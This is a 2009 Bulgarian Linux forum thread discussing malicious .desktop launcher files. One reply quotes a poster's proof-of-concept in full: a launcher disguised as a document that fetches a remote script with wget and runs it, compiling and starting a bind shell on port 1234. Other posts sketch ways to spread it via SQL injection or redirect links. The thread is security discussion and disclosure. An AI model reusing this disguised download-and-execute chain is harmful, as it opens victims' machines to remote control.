Автор Тема: malware в linux?  (Прочетена 9402 пъти)

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
malware в linux?
« -: Feb 13, 2009, 12:50 »
Май не е толкова невероятно:

http://lwn.net/Articles/318755/
http://lwn.net/Articles/319072/
Активен

"Knowledge is power" - France is Bacon

kingfisher

  • Напреднали
  • *****
  • Публикации: 102
    • Профил
Re: malware в linux?
« Отговор #1 -: Feb 13, 2009, 15:39 »
"How to write a Linux virus in 5 easy steps" is a false title. It should be called:

"How to write a text file which, when downloaded deliberately and placed into a certain location, and then double-clicked, could potentially execute code within the context of the user account that ran it."
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: malware в linux?
« Отговор #2 -: Feb 13, 2009, 16:01 »
Има неща, за които съм съгласен.

Определено не е вирус, защото не отговаря на дефиницията за това, т.е не може да се самовъзпроизвежда, а се налага това да става в помощта на потребителя.

От друга страна нещо ме притесняват няколко момента, първо не се налага прикачения файл да има разширение .desktop и не се налага да е изпълним, за да може да се изпълнява какъвто и да било код с правата на потребителя. Дали ще кликваш отгоре или не е отделен въпрос.

И това gksu за което пишат е голяма недосмислица. Сега му хвърлих едно око, първо това нещо има наклонности да запомня root паролата и да не те пита повече за нея, нещо, което може да създаде много огромни главоболия ако се ползва. Освен това е написано некадърно, за нула време например открих format string бъг в него, който не е фатален, защото програмата не работи с suid привилегиии, но доказва, че е писана немарливо. Такива неща в днешни дни са рядкост:



« Последна редакция: Feb 13, 2009, 16:03 от gat3way »
Активен

"Knowledge is power" - France is Bacon

ANTIADMIN

  • Напреднали
  • *****
  • Публикации: 660
  • Distribution: Windows XP Pro latest updates
  • ANTIADMIN
    • Профил
Re: malware в linux?
« Отговор #3 -: Feb 13, 2009, 18:04 »
A false sense of security is worse than a lack of security.

Ето това е най-полезното от цялата простотия. Типичен малоумен блогър (сори), а кви сравнения прави с уиндоус, приличат ми на фанатиците в дира и тук - като не познаваш нещо, млъкни си и не се излагай бе теба у смешника прост.
Това май е началото на края, чета идва ред и на БСД ;D
И за да приключа с още една мъдрост - то май уиндоус излезе по-сигурен от Убунту ;D A false sense...
Активен

strandvata

  • Напреднали
  • *****
  • Публикации: 28
    • Профил
Re: malware в linux?
« Отговор #4 -: Feb 13, 2009, 18:36 »
//off topic

Цитат
Вие току-що получихте първия албански вирус! Тъй като тук не сме много напреднали с компютрите, това е ръчен вирус! Ще ви помолим:
1 - Да изпратите същото писмо на всичките Ваши познати, които има e mail адрес.
2 - Да изтриете съдържанието на диска C
Активен

bozho

  • Напреднали
  • *****
  • Публикации: 115
    • Профил
Re: malware в linux?
« Отговор #5 -: Feb 13, 2009, 20:23 »
То хубаво "албански вирус", ама нещата, за които gat3way пише са сериозни.
 :(
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: malware в linux?
« Отговор #6 -: Feb 13, 2009, 21:23 »
Мисля, че малко надценявате средностатистическият потребител. Дори немалка част от линукс потребителите не са много security-aware а и дори да не са, леко си вярват в утопията, че им е сигурна платформата.

Ето го примера:

http://www.gat3way.eu/abetapak.oo

Което е доста груб пример. Ако вие както мен ползвате iceweasel (firefox) и даунлоуд-натите ви файлове отиват на десктоп-а, ще забележите че това нещо ще ви попита да запишете "MSH" файл (и не знае с какво да го отвори - съжалявам че съм избрал толкова тъп пример, ма не ми се мисли креативно по въпроса). Когато браузъра ви го запише, ще видите, че иконата на този файл наподобява по-скоро на някакъв документ, отколкото на непознат файл.

Ако кликнете веднъж отгоре (щото ползвате КДЕ като мен :) ) след малко ще ви се появи един README файл на десктопа, който ще ви информира каква грандиозна простотия сте сътворили и до какво е довела (апропо, сама по себе си простотията е безобидна, но води до доста лоши неща - затова веднага си вижте таблицата с процесите накрая и УБИЙТЕ лошия процес, за да не се възползва случаен човек от цялата работа).


Както виждате не е особено сложно. В смисъл не е чак толкова сложно човек да се заблуди да направи такава простотия.

Иначе съм съгласен, че ако си културен човек и си съзнателен, това нещо няма да мине.

Ама е забавно де, не знаех че такива глупости могат да се случват.
Активен

"Knowledge is power" - France is Bacon

phantomlord

  • Напреднали
  • *****
  • Публикации: 1832
  • Distribution: Debian Sid
  • Window Manager: KDE 4
  • Fall to your knees and bow to the Phantom Lord
    • Профил
    • WWW
Re: malware в linux?
« Отговор #7 -: Feb 13, 2009, 21:37 »
Аз пък си го отворих направо с kate:
Цитат
[Desktop Entry]
Exec=wget http://www.gat3way.eu/prase.txt -O /tmp/prase;chmod +x /tmp/prase;/tmp/prase
Type=Application
Icon=document
Цитат
#!/bin/bash
mkdir /tmp/.ops
cd /tmp/.ops
wget http://packetstormsecurity.com/advisories/suid/bindshell.c
cc -o bs bindshell.c
echo -e "WARNING!\nTo see what you've just done, type 'nc localhost 1234' !!!\nPlease kill the bindshell process ASAP!\n" > ~/Desktop/README
./bs
Хитро...
« Последна редакция: Feb 13, 2009, 21:39 от phantomlord »
Активен

http://myfreesoft.net/phpBB2/index.php?c=7
Помогни си сам, за да ти помогне и Господ
Linux - connecting people...

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: malware в linux?
« Отговор #8 -: Feb 13, 2009, 21:49 »
Е, разбира се, обаче ти най-малкото *знаеш* че това нещо не е наред.

Сега аз мога да развия един параноичен сценарии - примерно намира се някакъв sql injection проблем на openfmi.net, който в крайна сметка позволява манипулиране на базата им. Създавам си един проект и качвам тая глупост там, като подменям линковете на останалите проекти да сочат към тая простотия, която кръщавам "hipermiperproekt.0.4.tar.gz." да речем (с което не ТВЪРДЯ че там има такива проблеми, просто теоретично.) Някой си смъква проекта (който е с икона на архив този път) и кликва отгоре да разгледа какви файлове има вътре или пък най-малкото да го разархивира (сега друг е въпроса, че това е малоумно и че бих си създал някакъв "специален" проект, а не шибана десктоп икона).

Тогава ще бъдеш доста по-склонен да запишеш и отвориш тази глупост.

А иначе съм съгласен на 100%, че това е от нещата, които изискват предоверяване от страна на жертвите, зависи от навиците им и не е гарантирано. В някои случаи може да е по-лесно, в други да е по-трудно да ги накараш да ти се доверят.

Хм или пък нещо от сорта на това:

http://en.securitylab.ru/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=http%3a%2f%2fwww.gat3way.eu%2fabetapak.oo

securitylab.ru се очаква да е надежден източник за смъкване на каквото и да било примерно :)
« Последна редакция: Feb 13, 2009, 22:43 от gat3way »
Активен

"Knowledge is power" - France is Bacon

edmon

  • Гост
Re: malware в linux?
« Отговор #9 -: Feb 13, 2009, 22:36 »
тия десктоп говна са кофти....как така тая тапотия взе, че се изпълни...
някъв .оо файл ...
gat3way те май са се осъзнали нали... тва ще го разкарат...
напиши им бъг репорт
не може да е толкова тапо...
тва само КДЕ ли го прави или и ГНОМ?
НЕ не не не не мога да се стърпя...ще го постна в lwn.net...
« Последна редакция: Feb 13, 2009, 22:40 от edmon »
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: malware в linux?
« Отговор #10 -: Feb 13, 2009, 22:44 »
Какво да се репорт-ва след като това, което съм направил е илюстрация на нещо прочетено точно там (в lwn) :)

Абе има възможности за грозни изпълнения, сега като се замисля, това може да вдига едно фалшиво прокси и да промени настройките на firefox така че да се минава оттам например. Това би могло да се използва за криминални занимания :)
« Последна редакция: Feb 13, 2009, 22:48 от gat3way »
Активен

"Knowledge is power" - France is Bacon

edmon

  • Гост
Re: malware в linux?
« Отговор #11 -: Feb 13, 2009, 22:48 »
на КДЕ барабар с примерчето!
Активен

Ivshti

  • Напреднали
  • *****
  • Публикации: 322
  • Distribution: Linvo 2010.3
  • Window Manager: Gnome
    • Профил
    • WWW
Re: malware в linux?
« Отговор #12 -: Feb 13, 2009, 22:51 »
GNOME проверя в несъответствие между разширението и MIME типа (както тук) и предупреждава че вероятно е проблем със сигурността.
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: malware в linux?
« Отговор #13 -: Feb 13, 2009, 22:52 »
И КДЕ и гном сигурно вече си ги знаят тези проблеми :)

Все пак браво на човека дето си ги описал в блога. Сигурно звучат като глупости, обаче наистина мисля, че дават мегдан за грозни изпълнения. Защото някакъв процент от хората няма да се замислят, като кликат по разни неща и това че ползват линукс не им е никаква панацея. Тя и без това не им е панацея, но това си е подмолно. Хора, които са свикнали с графични среди и обичат да се предоверяват, биха пострадали от такива изпълнения. А и както казах, могат да се сътворяват разни схеми свързани с XSS или SQL injection проблеми, които биха подлъгали и по-опитни потребители да се доверяват.

Обаче като цяло това също така има грандиозен потенциал да се превърне в нещо крайно преекспонирано и да се взема прекалено насериозно :)

Тъпото е че наскоро купихме лаптоп за жена ми и понеже тя не може да се оправя с любимата операционна система, сложихме виста. Доскоро нямах никакви наблюдения от тъпата виста, обаче като гледам, там каквото и да смъкна се задават въпроси искам ли да се инсталира, дава някаква информация за обекта, който си кликнал и така нататък. Глупава работа, да не се окаже, че вистата все пак е малко по-разумно направена среда от КДЕ да речем :)
« Последна редакция: Feb 13, 2009, 22:58 от gat3way »
Активен

"Knowledge is power" - France is Bacon

tarator

  • Напреднали
  • *****
  • Публикации: 849
    • Профил
Re: malware в linux?
« Отговор #14 -: Feb 13, 2009, 22:59 »
Само да кажа как е в MacOSX, от потребителска гледна точка, не знам как го реализират. За всяко приложение свалено от Интернет операционната система помни, че е свалено от мрежата и първия път когато се опиташ да го пуснеш предупреждава, че приложението може да е опасно. Ако все пак решиш да продължиш на своя отговорност повече не получаваш предупреждения.
Активен

A gentleman is one who is never rude unintentionally. - Noel Coward

Подобни теми
Заглавие Започната от Отговора Прегледи Последна публикация
Бисквитките на linux-bg.org
Предложения за подобрения на сайта
ogi 0 4213 Последна публикация Apr 29, 2002, 21:40
от ogi
Mandrake Linux 10 and Linux
Настройка на програми
aaaSASlover 3 8816 Последна публикация Dec 08, 2012, 20:46
от UBIGI
Remote връзка Linux<--> Linux
Настройка на програми
stoyanovs 5 7430 Последна публикация Jan 24, 2006, 16:49
от gostenin
Experienced linux enginnced linux engineers
Търсене
bulwork 0 7491 Последна публикация May 10, 2008, 14:24
от bulwork
malware във всеки php файл
Web development
bILLY 10 4345 Последна публикация Feb 04, 2015, 17:04
от neter